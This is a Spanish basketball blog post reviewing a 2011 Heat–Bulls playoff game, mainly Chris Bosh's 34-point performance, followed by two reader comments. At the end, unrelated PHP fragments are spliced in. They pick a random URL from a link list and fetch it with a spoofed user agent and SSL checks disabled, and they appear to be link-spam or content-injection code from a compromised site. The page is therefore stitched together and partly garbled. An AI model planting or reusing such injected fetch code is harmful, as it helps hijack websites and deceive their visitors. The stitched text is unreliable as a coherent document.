Playoffs (22/05/2011): Usual Suspect

23 de May de 2011 por TheDeerHunter

Desde el primer momento que se formó el tridente estelar de los Heat todos dimos por supuesto que el punto débil del mismo podía ser Chris Bosh. El talento puro suele levantar recelos. La temporada regular y el principio de la postemporada parecía dar la razón a sus críticos. Sin embargo, ha tenido que llegar el momento menos favorable para que el tercero del Big Three demuestre su carácter de pura sangre dejándonos a muchos en renuncio. Tan sólo con su actuación en esta serie justifica su presencia en este faraónico proyecto.
Ayer Bosh se mostró imparable y eso que enfrente se encontró a un inmenso Carlos Boozer. A pesar del déficit bajo tableros, los Heat nunca se vieron en problemas. Ni los afamados sistemas defensivos diseñados por Thibodeau, ni las contrastadas virtudes defensivas de Joakim Noah sirvieron ayer de mucho ante la eficacia ofensiva del dorsal #1 de Miami.

No sólo sorprendió el buen hacer de Bosh ayer. Tremendo trabajo defensivo de la dupla Bibby-Chalmers. MVP Rose se quedó contra ellos en un pobre 4 de 12, y en un 0 de 3 cuando los Bulls lograron generar situaciones de aclarado. Tampoco estuvo brillante en la distribución el base estelar de los Bulls. Extraordinaria actuación de King James y buen desempeño de Joel Anthony y Udonis Haslem. Es una pésima señal para los Bulls que los Heat firmaran más de un 50% en tiro a pesar del mal partido de Wade. Ahora resulta que Miami es bastante más que el Big Three.

Dato: En el último lustro siempre ha pasado a la final el equipo que se lleva el 3º.

PREMIOS

MVP: Esta vez el mejor del partido fue la pieza menos valorada del Big Three de Miami, Chris Bosh. Fueron 34 puntos anotado en una buena serie de lanzamientos complementados con 5 rebotes, 2 asistencias y 2 robos.

Sorpresa: Por un lado, Udonis Haslem, cuya importancia en la serie va más allá de los números. Por el otro, la buena defensa de Mike Bibby y Mario Chalmers sobre Derrick Rose al que mantuvieron controlado todo el partido.

Decepción: Joakim Noah se fue mentalmente del partido después de cometer su 2ª falta personal a falta de 6 minutos para el final del primer cuarto e intercambiar opiniones con un espectador sentado detrás suyo. Falló los 4 lanzamientos a canasta que intentó y se quedó en 1 solo punto.

Esfuerzo en vano: Carlos Boozer se pegó como un cosaco bajo los tableros y sacó 17 rebotes, de ellos 7 ofensivos que le permitieron llegar a los 26 puntos.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Pues problemas de los buenos para los Bulls.
    En este partido los Heat se han mostrado superiores desde el principio. La sensación era que los Heat estaban bastante mejor que los de Chicago todo el partido y sin embargo los Bulls estaban cerquita siempre.
    El problema principal para los Bulls es que no consiguen atacar con eficacia. Rose está muy bien contenido en sus penetraciones y parece haber perdido fe en su tiro por lo que están todos esperándole bajo el aro donde sus porcentajes bajan al tirar casi siempre muy forzado. Con Rose en problemas todo el ataque de Chicago se resiente los tiradores no encuentran lanzamientos y Deng es controlado por la defensa de LeBron. En el otro lado con LeBron ejerciendo de base casi todo el partido repartiendo juego partidazo de Bosh para compensar el partidazo de Boozer y los Heat casi siempre encuentran una jugada a través de uno de los tres del Big Three que o anotan o fuerzan desequilibrios en la defensa.
    Ahora mismo la serie parece decantarse de Miami pero ya se sabe que estas sensaciones pueden cambiar mucho en playoffs de un partido a otro. Veremos si Chicago puede ajustar sobre todo su ataque y hacer daño a los Heat liberando un poco de la presión a Rose e intentar hacer más daño interior a los Heat.

      Citar

  2. Javijaen dice:
    #2

    Bastante de acuerdo con GreenPrice, Rose si desaparece es la perdición de Bulls. Esta vez Boozer estuvo demasiado solo, quizá solo con Gibson. Por otro lado, partido gris de Wade, y Bosh estuvo en su sitio. Está claro que de estos tres siempre que dos den la talla está bastante decantado. Además, el banquillo cuando aporta un poco se nota mucho.
    Particularmente, Bosh es el que más me gusta de este Big Three porque ha sabido amoldarse y renunciar a su protagonismo. Se merecía esto en playoffs.
    Por cierto, el arbitraje sigue pésimo para los de fuera. Lo digo igual cuando es a favor de Bulls o de Heat.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>